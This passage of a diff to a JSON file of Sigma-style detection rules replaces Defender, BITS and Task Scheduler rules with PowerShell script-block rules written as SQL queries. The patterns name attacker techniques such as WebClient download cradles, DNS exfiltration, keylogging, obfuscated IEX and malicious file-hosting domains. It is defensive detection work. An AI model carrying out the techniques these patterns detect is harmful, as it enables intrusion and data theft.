"SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1121' AND (ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\psexesvc.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object %' ESCAPE '\\' AND ScriptBlockText LIKE '%System.DirectoryServices.DirectorySearcher%' ESCAPE '\\' AND ScriptBlockText LIKE '%.PropertiesToLoad.Add%' ESCAPE '\\' AND ScriptBlockText LIKE '%.findall()%' ESCAPE '\\' AND ScriptBlockText LIKE '%Properties.name%' ESCAPE '\\')" ], - "filename": "win_defender_psexec_wmi_asr.yml" + "filename": "posh_ps_directorysearcher.yml" }, { - "title": "Windows Defender AMSI Trigger Detected", - "id": "ea9bf0fa-edec-4fb8-8b78-b119f2528186", - "status": "stable", - "description": "Detects triggering of AMSI by Windows Defender.", - "author": "Bhabesh Raj", + "title": "User Discovery And Export Via Get-ADUser Cmdlet - PowerShell", + "id": "c2993223-6da8-4b1a-88ee-668b8bf315e9", + "status": "experimental", + "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.discovery", + "attack.t1033" ], "falsepositives": [ - "Unlikely" + "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1116' AND SourceName = 'AMSI')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADUser %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Filter \\*' ESCAPE '\\' AND (ScriptBlockText LIKE '% > %' ESCAPE '\\' OR ScriptBlockText LIKE '% | Select %' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-File%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Content%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Content%' ESCAPE '\\'))" ], - "filename": "win_defender_amsi_trigger.yml" + "filename": "posh_ps_user_discovery_get_aduser.yml" }, { - "title": "Microsoft Defender Tamper Protection Trigger", - "id": "49e5bc24-8b86-49f1-b743-535f332c2856", - "status": "stable", - "description": "Detects blocked attempts to change any of Defender's settings such as \"Real Time Monitoring\" and \"Behavior Monitoring\"", - "author": "Bhabesh Raj, Nasreddine Bencherchali", + "title": "Clearing Windows Console History", + "id": "bde47d4b-9987-405c-94c7-b080410e8ea7", + "status": "test", + "description": "Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.", + "author": "Austin Songer @austinsonger", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1070", + "attack.t1070.003" ], "falsepositives": [ - "Administrator might try to disable defender features during testing (must be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5013' AND (Value LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\DisableAntiVirus' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableArchiveScanning' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningNetworkFiles' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableScriptScanning' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Clear-History%' ESCAPE '\\' OR ((ScriptBlockText LIKE '%Remove-Item%' ESCAPE '\\' OR ScriptBlockText LIKE '%rm%' ESCAPE '\\') AND (ScriptBlockText LIKE '%ConsoleHost\\_history.txt%' ESCAPE '\\' OR ScriptBlockText LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\'))))" ], - "filename": "win_defender_tamper_protection_trigger.yml" + "filename": "posh_ps_clearing_windows_console_history.yml" }, { - "title": "Windows Defender Threat Detection Disabled", - "id": "fe34868f-6e0e-4882-81f6-c43aa8f15b62", - "status": "stable", - "description": "Detects disabling Windows Defender threat protection", - "author": "Ján Trenčanský, frack113", + "title": "Disable-WindowsOptionalFeature Command PowerShell", + "id": "99c4658d-2c5e-4d87-828d-7c066ca537c3", + "status": "experimental", + "description": "Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", + "author": "frack113", "tags": [ "attack.defense_evasion", "attack.t1562.001" ], "falsepositives": [ - "Administrator actions (should be investigated)", - "Seen being triggered occasionally during Windows 8 Defender Updates" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('5001', '5010', '5012', '5101'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Disable-WindowsOptionalFeature%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Online%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FeatureName%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Windows-Defender-Gui%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-Features%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-ApplicationGuard%' ESCAPE '\\'))" ], - "filename": "win_defender_disabled.yml" + "filename": "posh_ps_disable_windows_optional_feature.yml" }, { - "title": "Windows Defender Threat Detected", - "id": "57b649ef-ff42-4fb0-8bf6-62da243a1708", - "status": "stable", - "description": "Detects all actions taken by Windows Defender malware detection engines", - "author": "Ján Trenčanský", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell", + "id": "1b9dc62e-6e9e-42a3-8990-94d7a10007f7", + "status": "experimental", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \\u2014", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1059" + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('1006', '1116', '1015', '1117'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ScriptBlockText REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ScriptBlockText REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ScriptBlockText REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ScriptBlockText REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR ScriptBlockText REGEXP '\\$VerbosePreference\\.ToString\\('))" ], - "filename": "win_defender_threat.yml" + "filename": "posh_ps_invoke_obfuscation_obfuscated_iex.yml" }, { - "title": "Important Scheduled Task Deleted", - "id": "9e3cb244-bdb8-4632-8c90-6079c8f4f16d", + "title": "Suspicious PowerShell Download - Powershell Script", + "id": "403c2cc0-7f6b-4925-9423-bfa573bed7eb", "status": "experimental", - "description": "Detects when adversaries try to stop system services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", - "author": "frack113", + "description": "Detects suspicious PowerShell download command", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1489" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "PowerShell scripts that download content from the Internet" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '141' AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((UserName LIKE '%AUTHORI%' ESCAPE '\\' OR UserName LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.Net.WebClient%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.DownloadFile(%' ESCAPE '\\' OR ScriptBlockText LIKE '%.DownloadString(%' ESCAPE '\\'))" ], - "filename": "win_taskscheduler_susp_schtasks_delete.yml" + "filename": "posh_ps_susp_download.yml" }, { - "title": "Scheduled Task Executed From A Suspicious Location", - "id": "424273ea-7cf8-43a6-b712-375f925e481f", + "title": "Powershell Keylogging", + "id": "34f90d3c-c297-49e9-b26d-911b05a4866c", "status": "experimental", - "description": "Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Adversaries may log user keystrokes to intercept credentials as the user types them.", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1053.005" + "attack.collection", + "attack.t1056.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '129' AND (Path LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Get-Keystrokes%' ESCAPE '\\' OR (ScriptBlockText LIKE '%Get-ProcAddress user32.dll GetAsyncKeyState%' ESCAPE '\\' AND ScriptBlockText LIKE '%Get-ProcAddress user32.dll GetForegroundWindow%' ESCAPE '\\')))" ], - "filename": "win_taskscheduler_execution_from_susp_locations.yml" + "filename": "posh_ps_keylogging.yml" }, { - "title": "Scheduled Task Executed Uncommon LOLBIN", - "id": "f0767f15-0fb3-44b9-851e-e8d9a6d0005d", + "title": "Add New Windows Capability - ScriptBlock", + "id": "155c7fd5-47b4-49b2-bbeb-eb4fab335429", "status": "experimental", - "description": "Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task", + "description": "Detects usage of the \"Add-WindowsCapability\" cmdlet to add new windows capabilities. Notable capabilities could be \"OpenSSH\" and others.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1053.005" + "attack.execution" ], "falsepositives": [ - "False positives may occur with some of the selected binaries if you have tasks using them (which could be very common in your environment). Exclude all the specific trusted tasks before using this rule" + "Legitimate usage of the capabilities by administartors or users. Filter accordingly" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '129' AND (Path LIKE '%\\\\calc.exe' ESCAPE '\\' OR Path LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Path LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Path LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR Path LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Path LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Path LIKE '%\\\\wscript.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-WindowsCapability %' ESCAPE '\\' AND ScriptBlockText LIKE '%OpenSSH.%' ESCAPE '\\')" ], - "filename": "win_taskscheduler_lolbin_execution_via_task_scheduler.yml" + "filename": "posh_ps_add_windows_capability.yml" }, { - "title": "Suspicious Download with BITS from Direct IP", - "id": "90f138c1-f578-4ac3-8c49-eecfd847c8b7", - "status": "experimental", - "description": "Detects a suspicious download using the BITS client from a direct IP. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Powershell DNSExfiltration", + "id": "d59d7842-9a21-4bc6-ba98-64bfe0091355", + "status": "test", + "description": "DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.exfiltration", + "attack.t1048" ], "falsepositives": [ - "Unknown" + "Legitimate script" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND (EventID = '16403' AND (RemoteName LIKE '%http://1%' ESCAPE '\\' OR RemoteName LIKE '%http://2%' ESCAPE '\\' OR RemoteName LIKE '%http://3%' ESCAPE '\\' OR RemoteName LIKE '%http://4%' ESCAPE '\\' OR RemoteName LIKE '%http://5%' ESCAPE '\\' OR RemoteName LIKE '%http://6%' ESCAPE '\\' OR RemoteName LIKE '%http://7%' ESCAPE '\\' OR RemoteName LIKE '%http://8%' ESCAPE '\\' OR RemoteName LIKE '%http://9%' ESCAPE '\\' OR RemoteName LIKE '%https://1%' ESCAPE '\\' OR RemoteName LIKE '%https://2%' ESCAPE '\\' OR RemoteName LIKE '%https://3%' ESCAPE '\\' OR RemoteName LIKE '%https://4%' ESCAPE '\\' OR RemoteName LIKE '%https://5%' ESCAPE '\\' OR RemoteName LIKE '%https://6%' ESCAPE '\\' OR RemoteName LIKE '%https://7%' ESCAPE '\\' OR RemoteName LIKE '%https://8%' ESCAPE '\\' OR RemoteName LIKE '%https://9%' ESCAPE '\\')) AND NOT (((RemoteName LIKE '%://10.%' ESCAPE '\\' OR RemoteName LIKE '%://192.168.%' ESCAPE '\\' OR RemoteName LIKE '%://172.16.%' ESCAPE '\\' OR RemoteName LIKE '%://172.17.%' ESCAPE '\\' OR RemoteName LIKE '%://172.18.%' ESCAPE '\\' OR RemoteName LIKE '%://172.19.%' ESCAPE '\\' OR RemoteName LIKE '%://172.20.%' ESCAPE '\\' OR RemoteName LIKE '%://172.21.%' ESCAPE '\\' OR RemoteName LIKE '%://172.22.%' ESCAPE '\\' OR RemoteName LIKE '%://172.23.%' ESCAPE '\\' OR RemoteName LIKE '%://172.24.%' ESCAPE '\\' OR RemoteName LIKE '%://172.25.%' ESCAPE '\\' OR RemoteName LIKE '%://172.26.%' ESCAPE '\\' OR RemoteName LIKE '%://172.27.%' ESCAPE '\\' OR RemoteName LIKE '%://172.28.%' ESCAPE '\\' OR RemoteName LIKE '%://172.29.%' ESCAPE '\\' OR RemoteName LIKE '%://172.30.%' ESCAPE '\\' OR RemoteName LIKE '%://172.31.%' ESCAPE '\\' OR RemoteName LIKE '%://127.%' ESCAPE '\\' OR RemoteName LIKE '%://169.254.%' ESCAPE '\\')) OR ((RemoteName LIKE '%https://7-%' ESCAPE '\\' OR RemoteName LIKE '%http://7-%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Invoke-DNSExfiltrator%' ESCAPE '\\' OR (ScriptBlockText LIKE '% -i %' ESCAPE '\\' AND ScriptBlockText LIKE '% -d %' ESCAPE '\\' AND ScriptBlockText LIKE '% -p %' ESCAPE '\\' AND ScriptBlockText LIKE '% -doh %' ESCAPE '\\' AND ScriptBlockText LIKE '% -t %' ESCAPE '\\')))" ], - "filename": "win_bits_client_direct_ip_access.yml" + "filename": "posh_ps_invoke_dnsexfiltration.yml" }, { - "title": "Suspicious Uncommon Download with BITS from Suspicious TLD", - "id": "6d44fb93-e7d2-475c-9d3d-54c9c1e33427", - "status": "experimental", - "description": "Detects a suspicious download using the BITS client from a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", - "author": "Florian Roth (Nextron Systems)", + "title": "PowerShell Deleted Mounted Share", + "id": "66a4d409-451b-4151-94f4-a55d559c49b0", + "status": "test", + "description": "Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation", + "author": "oscd.community, @redcanary, Zach Stanford @svch0st", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.t1070.005" ], "falsepositives": [ - "Other legitimate domains used by software updaters" + "Administrators or Power users may remove their shares via cmd line" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND NOT ((RemoteName LIKE '%.com%' ESCAPE '\\' OR RemoteName LIKE '%.azureedge.net%' ESCAPE '\\' OR RemoteName LIKE '%.sfx.ms%' ESCAPE '\\' OR RemoteName LIKE '%download.mozilla.org%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Remove-SmbShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-FileShare%' ESCAPE '\\'))" ], - "filename": "win_bits_client_uncommon_domain.yml" + "filename": "posh_ps_susp_mounted_share_deletion.yml" }, { - "title": "Suspicious Download File Extension with BITS", - "id": "b85e5894-9b19-4d86-8c87-a2f3b81f0521", - "status": "experimental", - "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", - "author": "frack113", + "title": "Suspicious PowerShell WindowStyle Option", + "id": "313fbb0a-a341-4682-848d-6d6f8c4fab7c", + "status": "test", + "description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users.\nIn some cases, windows that would typically be displayed when an application carries out an operation can be hidden\n", + "author": "frack113, Tim Shelton (fp AWS)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.t1564.003" ], "falsepositives": [ - "Administrator PowerShell scripts" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND (EventID = '16403' AND (LocalName LIKE '%.bat' ESCAPE '\\' OR LocalName LIKE '%.dll' ESCAPE '\\' OR LocalName LIKE '%.exe' ESCAPE '\\' OR LocalName LIKE '%.ps1' ESCAPE '\\' OR LocalName LIKE '%.vbe' ESCAPE '\\' OR LocalName LIKE '%.vbs' ESCAPE '\\')) AND NOT (LocalName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND RemoteName LIKE '%.com%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%powershell%' ESCAPE '\\' AND ScriptBlockText LIKE '%WindowStyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%Hidden%' ESCAPE '\\') AND NOT (ScriptBlockText LIKE '%:\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\%' ESCAPE '\\' AND ScriptBlockText LIKE '%$PSScriptRoot\\\\Module\\\\WorkspaceScriptModule\\\\WorkspaceScriptModule%' ESCAPE '\\'))" ], - "filename": "win_bits_client_susp_local_file.yml" + "filename": "posh_ps_susp_windowstyle.yml" }, { - "title": "Suspicious Download with BITS from Suspicious TLD", - "id": "d635249d-86b5-4dad-a8c7-d7272b788586", + "title": "Execution via CL_Invocation.ps1 - Powershell", + "id": "4cd29327-685a-460e-9dac-c3ab96e549dc", "status": "experimental", - "description": "Detects a suspicious download using the BITS client from a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", + "author": "oscd.community, Natalia Shornikova", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.t1216" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (RemoteName LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR RemoteName LIKE '%mediafire.com%' ESCAPE '\\' OR RemoteName LIKE '%mega.nz%' ESCAPE '\\' OR RemoteName LIKE '%ddns.net%' ESCAPE '\\' OR RemoteName LIKE '%.paste.ee%' ESCAPE '\\' OR RemoteName LIKE '%.hastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%.ghostbin.co/%' ESCAPE '\\' OR RemoteName LIKE '%ufile.io%' ESCAPE '\\' OR RemoteName LIKE '%storage.googleapis.com%' ESCAPE '\\' OR RemoteName LIKE '%anonfiles.com%' ESCAPE '\\' OR RemoteName LIKE '%send.exploit.in%' ESCAPE '\\' OR RemoteName LIKE '%transfer.sh%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.net%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.com%' ESCAPE '\\' OR RemoteName LIKE '%sendspace.com%' ESCAPE '\\' OR RemoteName LIKE '%pastetext.net%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.pl%' ESCAPE '\\' OR RemoteName LIKE '%paste.ee%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%SyncInvoke%' ESCAPE '\\')" ], - "filename": "win_bits_client_susp_domain.yml" + "filename": "posh_ps_cl_invocation_lolscript.yml" }, { - "title": "Download with BITS to Suspicious Folder", - "id": "f8a56cb7-a363-44ed-a82f-5926bb44cd05", + "title": "PowerShell Hotfix Enumeration", + "id": "f5d1def8-1de0-4a0e-9794-1f6f27dd605c", "status": "experimental", - "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects call to \"Win32_QuickFixEngineering\" in order to enumerate installed hotfixes often used in \"enum\" scripts by attackers", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.discovery" ], "falsepositives": [ - "Administrator PowerShell scripts" + "Legitimate administration scripts" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (LocalName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR LocalName LIKE '%\\%public\\%%' ESCAPE '\\' OR LocalName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR LocalName LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Win32\\_QuickFixEngineering%' ESCAPE '\\' AND ScriptBlockText LIKE '%HotFixID%' ESCAPE '\\')" ], - "filename": "win_bits_client_susp_local_folder.yml" + "filename": "posh_ps_hotfix_enum.yml" }, { - "title": "Unsigned Binary Loaded From Suspicious Location", - "id": "8289bf8c-4aca-4f5a-9db3-dc3d7afe5c10", + "title": "Invoke-Obfuscation Via Use Clip - Powershell", + "id": "db92dd33-a3ad-49cf-8c2c-608c3e30ace0", "status": "experimental", - "description": "Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ImageName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR ImageName LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" ], - "filename": "win_security_mitigations_unsigned_dll_from_susp_location.yml" + "filename": "posh_ps_invoke_obfuscation_via_use_clip.yml" }, { - "title": "Microsoft Defender Blocked from Loading Unsigned DLL", - "id": "0b0ea3cc-99c8-4730-9c53-45deee2a4c86", - "status": "experimental", - "description": "Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL", - "author": "Bhabesh Raj", + "title": "Powershell Detect Virtualization Environment", + "id": "d93129cd-1ee0-479f-bc03-ca6f129882e3", + "status": "test", + "description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments.\nThis may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox\n", + "author": "frack113, Duc.Le-GTSC", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1497.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ProcessPath LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR ProcessPath LIKE '%\\\\NisSrv.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%gwmi%' ESCAPE '\\') AND (ScriptBlockText LIKE '%MSAcpi\\_ThermalZoneTemperature%' ESCAPE '\\' OR ScriptBlockText LIKE '%Win32\\_ComputerSystem%' ESCAPE '\\'))" ], - "filename": "win_security_mitigations_defender_load_unsigned_dll.yml" + "filename": "posh_ps_detect_vm_env.yml" }, { - "title": "Suspicious Digital Signature Of AppX Package", - "id": "b5aa7d60-c17e-4538-97de-09029d6cd76b", + "title": "Root Certificate Installed - PowerShell", + "id": "42821614-9264-4761-acfc-5772c3286f76", "status": "experimental", - "description": "Detects execution of AppX packages with known suspicious or malicious signature", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", + "author": "oscd.community, @redcanary, Zach Stanford @svch0st", "tags": [ "attack.defense_evasion", - "attack.execution" + "attack.t1553.004" ], "falsepositives": [ - "Unknown" + "Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppxPackaging/Operational' AND EventID = '157' AND subjectName = 'CN=Foresee Consulting Inc., O=Foresee Consulting Inc., L=North York, S=Ontario, C=CA, SERIALNUMBER=1004913-1, OID.1.3.6.1.4.1.311.60.2.1.3=CA, OID.2.5.4.15=Private Organization')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Move-Item%' ESCAPE '\\' AND ScriptBlockText LIKE '%Cert:\\\\LocalMachine\\\\Root%' 